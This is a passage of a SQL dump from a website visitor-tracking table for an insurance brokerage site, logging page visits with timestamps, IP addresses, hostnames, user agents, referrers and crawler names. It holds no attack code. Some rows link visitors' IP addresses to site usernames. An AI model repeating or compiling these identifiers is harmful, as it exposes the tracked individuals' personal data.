900','','','','','','0','0',0),(29067,'0b_9e4d136ca8dec589437ccd8af43518cb','1463074707','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29069,'0b_9e4d136ca8dec589437ccd8af43518cb','1463074709','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29072,'0b_d0f32029359fed2424986a72f588c17e','1463074752','67.83.103.143','ool-4353678f.dyn.optonline.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; GWX:DOWNLOADED; GWX:RESERVED; GWX:QUALIFIED; ms-office)','','',0,'Win7 x64','IE 7','','','','','','','','0','0',0),(29075,'0b_14ead41a993f43c4b184b743e57978dc','1463074753','67.83.103.143','ool-4353678f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','51',0),(29078,'0b_14ead41a993f43c4b184b743e57978dc','1463074753','67.83.103.143','ool-4353678f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(29079,'0b_14ead41a993f43c4b184b743e57978dc','1463074787','67.83.103.143','ool-4353678f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(29082,'0b_fef32cca04aef963289b8b9fe2b135f6','1463075043','180.76.15.15','baiduspider-180-76-15-15.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(29084,'0b_28ab80e59009e684a2da0efc62823c8c','1463075926','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(29085,'0b_a0afaf7039f56c35d5d2676136412aab','1463077611','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 49','us','1280 x 720','Google','','','','','3','0',0),(29088,'0b_a0afaf7039f56c35d5d2676136412aab','1463077614','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','0',0),(29090,'0b_a0afaf7039f56c35d5d2676136412aab','1463077629','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 49','us','1280 x 720','Google','','','','','3','51',0),(29091,'0b_a0afaf7039f56c35d5d2676136412aab','1463077630','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','0',0),(29093,'0b_a0afaf7039f56c35d5d2676136412aab','1463077635','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29094,'0b_a0afaf7039f56c35d5d2676136412aab','1463077637','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29097,'0b_a0afaf7039f56c35d5d2676136412aab','1463077640','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29100,'0b_a0afaf7039f56c35d5d2676136412aab','1463077641','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29102,'0b_a0afaf7039f56c35d5d2676136412aab','1463077643','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/carriers/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29103,'0b_a0afaf7039f56c35d5d2676136412aab','1463077645','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29105,'0b_a0afaf7039f56c35d5d2676136412aab','1463077646','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29108,'0b_a0afaf7039f56c35d5d2676136412aab','1463077647','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29109,'0b_a0afaf7039f56c35d5d2676136412aab','1463077648','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','0',0),(29112,'0b_a0afaf7039f56c35d5d2676136412aab','1463077651','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29114,'0b_a0afaf7039f56c35d5d2676136412aab','1463077653','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29115,'0b_a0afaf7039f56c35d5d2676136412aab','1463077654','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29117,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078098','205.203.134.197','205.203.134.197','/robots.txt','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29118,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078108','205.203.134.197','205.203.134.197','/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29121,'0b_a0afaf7039f56c35d5d2676136412aab','1463078128','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 49','us','1280 x 720','Google','','','','','3','51',0),(29123,'0b_a0afaf7039f56c35d5d2676136412aab','1463078131','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','0',0),(29124,'0b_a0afaf7039f56c35d5d2676136412aab','1463078138','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29127,'0b_a0afaf7039f56c35d5d2676136412aab','1463078140','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29130,'0b_a0afaf7039f56c35d5d2676136412aab','1463078143','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/carriers/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29132,'0b_a0afaf7039f56c35d5d2676136412aab','1463078145','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29133,'0b_a0afaf7039f56c35d5d2676136412aab','1463078147','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29136,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078141','205.203.134.197','205.203.134.197','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29139,'0b_a0afaf7039f56c35d5d2676136412aab','1463078151','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/register/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29141,'0b_a0afaf7039f56c35d5d2676136412aab','1463078155','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/register/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29142,'0b_a0afaf7039f56c35d5d2676136412aab','1463078156','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29145,'0b_a0afaf7039f56c35d5d2676136412aab','1463078159','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29148,'0b_a0afaf7039f56c35d5d2676136412aab','1463078159','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29150,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078152','205.203.134.197','205.203.134.197','/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29153,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078162','205.203.134.197','205.203.134.197','/contact/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29154,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078173','205.203.134.197','205.203.134.197','/about-us/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29157,'0b_a0afaf7039f56c35d5d2676136412aab','1463078189','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29160,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078184','205.203.134.197','205.203.134.197','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29163,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078194','205.203.134.197','205.203.134.197','/meet-the-eib-team/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29166,'0b_a0afaf7039f56c35d5d2676136412aab','1463078205','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/?page_id=169','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','169',0),(29168,'0b_a0afaf7039f56c35d5d2676136412aab','1463078206','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/register/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','51',0),(29169,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078205','205.203.134.197','205.203.134.197','/carriers/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29172,'0b_a0afaf7039f56c35d5d2676136412aab','1463078222','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 720','','','','','','3','0',0),(29174,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078215','205.203.134.197','205.203.134.197','/igo/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29177,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078228','205.203.134.197','205.203.134.197','/agent-tools/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29178,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078239','205.203.134.197','205.203.134.197','/insentives/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29181,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078249','205.203.134.197','205.203.134.197','/licensing-contracting/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29183,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078260','205.203.134.197','205.203.134.197','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29184,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078270','205.203.134.197','205.203.134.197','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29187,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078281','205.203.134.197','205.203.134.197','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29190,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078291','205.203.134.197','205.203.134.197','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29193,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078301','205.203.134.197','205.203.134.197','/register/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29196,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078311','205.203.134.197','205.203.134.197','/case-status/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29199,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078322','205.203.134.197','205.203.134.197','/forms/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29201,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078332','205.203.134.197','205.203.134.197','/term-quotes/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29204,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078342','205.203.134.197','205.203.134.197','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29205,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078352','205.203.134.197','205.203.134.197','/?page_id=169','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29208,'0b_1204e44f376f4341f7ded5af0b8b9af1','1463078362','205.203.134.197','205.203.134.197','/members/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(29210,'0b_7575f9bbf75b8dc5798161308328eb1b','1463078431','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(29211,'0b_7575f9bbf75b8dc5798161308328eb1b','1463078432','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(29213,'0b_1b63cdc499cec92c0bd443ea73d669c3','1463078583','98.195.26.232','c-98-195-26-232.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','https://www.bing.com/','_notprovided_',1,'Win10','Google Chrome','us','','www.bing.com/','','','','','0','0',0),(29216,'0b_1b63cdc499cec92c0bd443ea73d669c3','1463078585','98.195.26.232','c-98-195-26-232.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(29219,'0b_8dd3baf8ed29d5da8d78b42757f07e82','1463078590','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(29222,'0b_8dd3baf8ed29d5da8d78b42757f07e82','1463079156','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(29225,'0b_012d39e9239ed5ff7c81ebff2739b75f','1463080444','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1366 x 768','','','','','','0','0',0),(29226,'0b_012d39e9239ed5ff7c81ebff2739b75f','1463080446','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1366 x 768','','','','','','0','0',0),(29229,'0b_012d39e9239ed5ff7c81ebff2739b75f','1463080449','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1366 x 768','','','','','','0','0',0),(29232,'0b_012d39e9239ed5ff7c81ebff2739b75f','1463080461','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1366 x 768','','','','jzicher','','0','51',0),(29235,'0b_9e855c7f32a0d47d8d925515d1b78168','1463080941','192.227.211.59','192-227-211-59-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 34','us','','','','','','','0','0',0),(29237,'0b_77120e0d59fe6e5a5d6d4f4a87cb200b','1463081612','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','execut1ve','','0','0',0),(29238,'0b_77120e0d59fe6e5a5d6d4f4a87cb200b','1463081615','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','0',0),(29241,'0b_77120e0d59fe6e5a5d6d4f4a87cb200b','1463081782','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','0',0),(29244,'0b_96ae98b916501310998b4d9c581c0dfb','1463082086','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(29247,'0b_0c85332fd606a7c371d63fde7b840e33','1463082170','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','0',0),(29249,'0b_0c85332fd606a7c371d63fde7b840e33','1463082171','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','0',0),(29252,'0b_0c85332fd606a7c371d63fde7b840e33','1463082173','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','51',0),(29255,'0b_0c85332fd606a7c371d63fde7b840e33','1463082177','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/case-status/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','51',0),(29256,'0b_0c85332fd606a7c371d63fde7b840e33','1463082185','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','51',0),(29259,'0b_865a9acf5ea0116efb561daba423f96e','1463082801','68.194.47.151','ool-44c22f97.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'WinXP','Chrome 49','us','','','','','','','0','0',0),(29261,'0b_77120e0d59fe6e5a5d6d4f4a87cb200b','1463084121','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','51',0),(29262,'0b_21dc6a9319a557a39679b82d483e1617','1463084159','100.38.56.149','pool-100-38-56-149.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(29264,'0b_21dc6a9319a557a39679b82d483e1617','1463084162','100.38.56.149','pool-100-38-56-149.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(29267,'0b_d869e71cca8f730c17e57da77d3fd541','1463084871','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 